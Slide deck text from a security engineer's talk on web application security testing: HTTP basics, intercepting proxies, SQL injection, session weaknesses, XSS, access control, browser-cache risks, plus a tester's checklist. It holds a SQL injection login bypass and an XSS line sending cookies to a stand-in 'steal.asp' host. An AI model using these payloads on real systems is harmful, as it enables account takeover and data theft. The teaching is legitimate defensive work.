Security Testing

Checklist

Web Application Security Testing

Siddharth Anbalahan
Senior Security Engineer
Agenda

HTTP Basics

Web Application Security Testing tool

Our Experiences

Security Testing Checklist
Author Bio

Siddharth Anbalahan, senior security Engineer, Paladion

Experience in 20+ software security tests

Developed an anti-phishing toolkit and a testing checklist for

thick client applications

Co-author of "Application Security in the ISO 27001

environment" (Oct 2007) from IT Governance

Author of several articles falling under the category of “best

practices” published in Palisade
HTTP Basics

Hyper Text Transfer Protocol

Client uses a web browser

Application connects to the DB using a username/password

Queries the DB for specific information

DB replies with the matching row (s)
Query
Request
Recordset
Response

Web server
HTTP Basics - Contd

HTTP is anonymous and stateless

No persistent connection between user & server
 Each request is discrete

For a new request, the server has no way of knowing if it is related
to the previous request

2 main types
 GET, when you click on a link
GET/AccountSummary?account=33445224566&type=credit_card

 POST, when you submit a form

POST /Login/Login.action HTTP/1.0
userName=paladion&userPassword=paladion123&app=sample
HTTP Basics Contd

Cookies
 Piece of info stored on the client by the server
 Persistent –

Text file written to the client’s hard disk

Expiry set by the server

 Non-persistent –

Stored in the browser’s memory

Lost when browser is closed
HTTP Basics Contd

User Sessions
Managed and Identified by a unique
session Token
Assigned by the server when user logs in
Sent by the Browser with every HTTP
request
HTTP Basics Contd

Sent in the following ways
 In the GET/POST request as a variable
GET /ViewAccountSummary.asp?Sessionid=344475524855699
&accountnum=344

POST /ChangePassword.asp
Host: www.site.com
&sessionid=445566229530554333203 &oldpass=sangita &newpass=pakala
 In the GET/POST request as a cookie
POST /TransferFunds.asp
Host: www.bank.com
Cookie: ASPSessionID=3444755248556935589933204105399
&FromAcct=34455334&ToAcct=62452135&Amount=1000
Web Application Security Testing
Tool

Web Proxy Editor
 Tool to intercept HTTP traffic between browser and server

We can even modify data before sending to the server

Intercept the traffic between browser and the web server

Web Browser WebProxy Server

Two way communication by WebProxy

 Web Application Security Testing
Tool
Setup the Web Proxy tool

Tools  Internet Options
Connections  Lan Settings
 Proxy Server

Set the address to loop back
address i.e. 127.0.0.1 and port
no to 8080(Read the proxy
manual for the correct port
number)
Our Experiences

Technical Vulnerabilities
 SQL Injection
 Weak Session Tracking
 Variable manipulation
 Cross Site Scripting
 Broken Access control
 Sensitive data in source
code
 Threats at the browser

Browser Refresh

Autocomplete Feature

Temporary Internet files

Business Risks
 Access without
Authentication
 Siphon off funds
 Steal Sensitive information
 User impersonation
 Denial of Service
 Privilege escalation of user
account
 Access account details of
other users
Web Application
Vulnerabilities

SQL Injection
SQL Injection

Probably the most notorious attack on
applications

Relies on manipulating SQL queries
constructed by the application
Expected:
username: abc
password: test123

When submitted, the SQL query will be built up as:

select * from users where username='abc
abc'
abc and password = 'test123
test123'
test123
SQL Injection

Trick to inject Structured Query Language (SQL) syntax or command as an
input via web pages

The unexpected:
username: abc';
abc'; --
password:

The following is the query sent onto the DB:

select * from users where uname='abc
abc’ -- and password=''
abc’; --'

Attacker can bypass authentication, access sensitive data, modify data,

cause a DOS or take over the server.

Demo: Bypassing Login

SQL Injection
Target Site

Login Successful
http://target.site/login.jsp

Expected
The Unexpected
from user
Malicious User
Weak Application
Vulnerabilities

Weak Session Tracking

Weak Session Tracking

Attacker wouldn’t know another user’s session
token unless

Predictable session tokens
 Login Ids( Alice, Bob, usr00019 etc.)
 Incremental session tokens(1111,1112 etc.)

Transmits session tokens in clear text

Expiry on logout

Session timeout

Reusing Session Tokens
Weak Session Tracking

Attacker can hijack sessions to
 Access another user’s account
 Escalate privileges to higher level
 Siphon off funds
 User Impersonation
Variable Manipulation

Simplest form of Application attack – Bread and Butter
hack

Fiddle around with variables
 URL Query strings
 HTML Text fields, Checkboxes,Drop Down lists,Hidden Fields ..
Etc.

Classic Examples
GET /user/ViewDetails.asp?&accountnum=34455334

POST /TransferFunds.jsp
&amount = 100&from=34455334&to=34551231
Variable Manipulation

The Challenge
 Many Variables to Play with
 Target Business Logic – Interesting Variables

FromAcct

Amount
 Manipulate multiple variable simultaneously

Attacker can siphon off funds, commit fraudulent
transactions, exceed or bypass business limits.
Web Application
Vulnerabilities

Broken Access Control

Broken Access Control

Primary Attack Vector – Forced Browsing
 Guess Unreferenced URLs
 Access to sensitive files

Configuration or Log files

Company or Personal Documents (Pdfs, Excel etc.)

Classic Examples
 /admin/adduser.aspx
 /WEB-INF/database.xml
 /Finance/BalanceSheet.xls
Broken Access Control

Attacker can use forced browsing to
 Circumvent Authentication
 Circumvent Authorization
 Steal sensitive data
 Web Application
Vulnerabilities

Sensitive Data in Source Code

Sensitive Data in Source Code

Primary attack Vector – Browser View  Source
 Sensitive data embeded in HTML Source code
 Sensitive data embeded in Javascript

validatepass(‘shakti456’,’shakti123’)
Javascript code that stores and
validates new password against
previous and current passwords
Sensitive data in source code
Registration page
Javascript code that stores all
usernames of the application

An attacker can steal sensitive information

from the source code of the application.
Web Application
Vulnerabilities

Cross Site Scripting(XSS)

XSS

An exploit that takes advantage of
sites reflecting input across users

Posted data contains script that
executes on viewers browsers
<script>window.navigate("http://somes
ite.net/steal.asp?cookie="+document.
cookie)</script>

Attacker can steal session tokens,
data etc.
XSS
Attacker.com Bank.com

Malicious link on webpage Webpage + Cookies

or email with malicious link

Executed

Malicious Link
http://bank.com/account.jsp? <SCRIPT>Send cookie to attacker.com
http://bank.com/login/

User
Internet
Banking
Cookie
XSS

Vulnerable Targets
 User Forums
 Chat rooms
 Mail Or Messaging Facility
 Online bulletin boards
 Anything that reflects user’s input back
without validation
Web Application
Vulnerabilities

Threats at the Browser

Threats at the Browser

Autocomplete feature

Browser Refresh

Browser Cache
Autocomplete feature

Allows browsers to
remember form
entries,
usernames and
passwords

Users may
inadvertently save
passwords when
browser prompts
them to do so.

Feature known as
“Autocomplete” in
IE and
“Remember
Passwords” in
Firefox
Autocomplete feature

A local attacker can steal passwords of
users from the browser as they are stored
in plain text.
Browser Refresh

Resubmits requests to the server
 Headers, variables, form fields, the works

The “request” can contain sensitive data

Extract the data by intercepting using a web
proxy
Browser Refresh

User logs out, leaves the browser open

Press back on the browser to reach Welcome
page

Start interception of HTTP Traffic using a HTTP
Proxy

Press “Refresh” to resubmit the login request
and view user credentials

Demo: Back-Refresh Exploit
 Browser Refresh
Server
Browser

POST Login ID+Password Authenticate

the user and
serve the next
www.website.com/Welcomepage.jsp page

Intercept
POST Login ID+Password

www.website.com/Welcomepage.jsp
Browser Refresh

A local attacker can steal passwords of
users of the application.
Browser Cache

A local store to improve performance
 The Temporary Internet Files folder in IE
 The Profile’s Application Data folder in FF

Pages accessed over HTTPs also get cached in the
local store.

In IE these pages are stored in
 C:\Documents and Settings\username\Local Settings\Temporary
Internet Files\

and in Firefox in
 C:\Documents and Settings\Username\Local
Settings\Application Data\Mozilla\Firefox\Profiles\
5rrn80xr.default\Cache
Browser Cache

Open Application
cached pages in
Notepad.

A local attacker
can steal account
activities
transaction details
and secrets of an
application user.
Security Testing
Checklist

The Checklist
The Checklist
1. Authentication
 Back-Refresh on login/change password page
 Autocomplete feature active
2. SQL Injection
 Are dynamic SQL queries used by the application?
 Inject single qoutes (‘) to generate DB errors.
3. XSS
 Are there input pages that are displayed to other
users?
 Inject Javascript - <script>alert(“XSS”)</script>
The Checklist contd
4. Weak Session Tracking
 Session token – random?
 Session token – expires on logout?
 Session token – times out on inactivity?
 Session token – Issued new on login?
 Session token – sent over SSL?
5. Variable Manipulation
 Possible to login as ‘A’ and commit transactions on
behalf of ‘B’ using data of ‘B’?
 Bypass clientside validation?
The Checklist contd
6. Broken Access Control
 Can authentication be bypassed

With deep unreferenced links

Direct links to sensitive files(Pdfs, XLS etc.)
 Can authorization be bypassed

By referencing administration pages
 Can sensitive data be stolen

By referencing default application config files

By referencing application log files
The Checklist contd
7. Sensitive data leaking out
 HTML view source has sensitive data?
 Hard coded secrets in Javascript?
 Sensitive pages in browser cache?
Application Security Testing:
Recommended Tools

Web Proxy Editors
 WebScarab(http://dawes.za.net/rogan/webscarab/)
 Paros Proxy(www.parosproxy.org)
 Burp Suite(www.portswigger.net/suite/)

Browser Extensions
 HTML Source Code Explorer( IE 5.0 and above)
www.vdberg.org/~richard/htmlbar.html
 Firefox Browser Extensions (addons.mozilla.org )

Web Spidering tools (Burp Spider, Paros Scanner)